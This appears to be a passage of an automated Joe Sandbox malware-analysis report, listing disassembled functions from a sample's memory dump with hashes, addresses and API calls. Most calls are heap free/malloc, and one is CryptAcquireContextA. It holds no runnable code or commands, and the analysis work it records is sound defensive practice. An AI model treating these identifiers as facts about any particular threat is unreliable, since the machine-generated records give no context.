                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: cb5019c0475ee907c7425e3588e5f4cac565f53107b5bc5bde1b2fb16b33a7b3
                                    • Instruction ID: a49040bdb1e750ba87e5ff2f3b693cfbc39677c5fc878c23e2deeb53e6765cc4
                                    • Opcode Fuzzy Hash: cb5019c0475ee907c7425e3588e5f4cac565f53107b5bc5bde1b2fb16b33a7b3
                                    • Instruction Fuzzy Hash: 81215E76600A26DFCB086F56FD54419FBA1FF48362754953AE90AA3761CB786C28CF80
                                    Function 00E214FA Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E21DBD,?,?,?,00E08B8E), ref: 00E2151F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08B8E), ref: 00E21549
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21577
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E215A5
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 62efc1fb23bb2c7a3cd5062289a7e465cb995f15bdf69e66c196684362382c82
                                    • Instruction ID: 5df0e15a3f9a8ff9237e8fe8b7ee6c83585dea8c023027f0f8ba975bfca1cac7
                                    • Opcode Fuzzy Hash: 62efc1fb23bb2c7a3cd5062289a7e465cb995f15bdf69e66c196684362382c82
                                    • Instruction Fuzzy Hash: 8F210832B40928EFDB099F24FC88799FB61FF85366F004196D405672A1CBB43E18CBA1
                                    Function 00E4A4C9 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A4FB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A52C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A54E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A565
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: e8565d90e2db421b83f4916adcffea18bd981e862c767b6e69cf0c45f7b91059
                                    • Instruction ID: 128f7ee39f0dec468048c5c1df4878f512dd0493d0641428d0f4c4d1206c0b01
                                    • Opcode Fuzzy Hash: e8565d90e2db421b83f4916adcffea18bd981e862c767b6e69cf0c45f7b91059
                                    • Instruction Fuzzy Hash: 9011ED76604A26EFCB089F66FD94419FBA1FF48361314952AD809A3A21CB74AC24CFC0
                                    Function 00E0FEA5 Relevance: 5.1, APIs: 4, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,00E09BB3,?,?,00000000), ref: 00E0FEE1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,00E09BB3,?,?,00000000), ref: 00E0FEF9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00E09BB3,?,?,00000000), ref: 00E0FF16
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0FF24
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 110aa303ad68f99f069988dee5316f5b816e928a319773f7c97199b8d5a9ec77
                                    • Instruction ID: 9c6b270e2f7bbe73a5ae471c1eacac5abfcbe30117e1f718a655b1a44c9b6575
                                    • Opcode Fuzzy Hash: 110aa303ad68f99f069988dee5316f5b816e928a319773f7c97199b8d5a9ec77
                                    • Instruction Fuzzy Hash: AB11C233605312DFC7388F94D884A6EB7B4FB01325F21052DE816B7961C771B9A1CB94
                                    Function 00E3A082 Relevance: 5.0, APIs: 4, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A0A9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A0CB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A0E8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A100
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: af657b7a2c25288ee74d959db8024e221dea235ca24ea7945ceeccbc56e79e25
                                    • Instruction ID: cbc5b870ea9946fac2d5d80c443a61f24df15f829b3b5af7bf4f75aaa08377f4
                                    • Opcode Fuzzy Hash: af657b7a2c25288ee74d959db8024e221dea235ca24ea7945ceeccbc56e79e25
                                    • Instruction Fuzzy Hash: D1116136514B16EFDB149F16F858799BBA0FF0436AF14802AD401A3661CBB8BC68CFD4
                                    Function 00E35C63 Relevance: 5.0, APIs: 4, Instructions: 46COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E21857), ref: 00E35C78
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E35CAD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E35CC4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E35CDB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 0e8a315b832c9b4a169880fc88bd844b9f683fbf4fd92477450b3cc1869aed55
                                    • Instruction ID: cb0d6994bb5bc9987f3ed3a1a2b90c33d113e5d90e051b5893ef67d13037511e
                                    • Opcode Fuzzy Hash: 0e8a315b832c9b4a169880fc88bd844b9f683fbf4fd92477450b3cc1869aed55
                                    • Instruction Fuzzy Hash: 1B01ED76A04A26DFCB085F56FC54419FBA1FF483A2310852AE419A3671CBB46C28CFD0
                                    Function 00E4C7A7 Relevance: 5.0, APIs: 4, Instructions: 46COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4C7B9
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4C7D6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4C7EF
                                      • Part of subcall function 00E4C6E0: CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,766B0130,?,00E4C800,00000000), ref: 00E4C6F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4C816
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: freemalloc$AcquireContextCrypt
                                    • String ID:
                                    • API String ID: 669775102-0
                                    • Opcode ID: c5ea851fd7be3a06f6c9d56394e3d8d36d1f1179fe2ebcdd276fe6ae711cf8df
                                    • Instruction ID: 6ac5b49b2fe4739fe348b6b48108525f3f9cf63762391297232fb040b4380bbf
                                    • Opcode Fuzzy Hash: c5ea851fd7be3a06f6c9d56394e3d8d36d1f1179fe2ebcdd276fe6ae711cf8df
                                    • Instruction Fuzzy Hash: 88018636715513DFCB886B26BC1811A7B95EF847F27319427D809F32A0DF645C088B90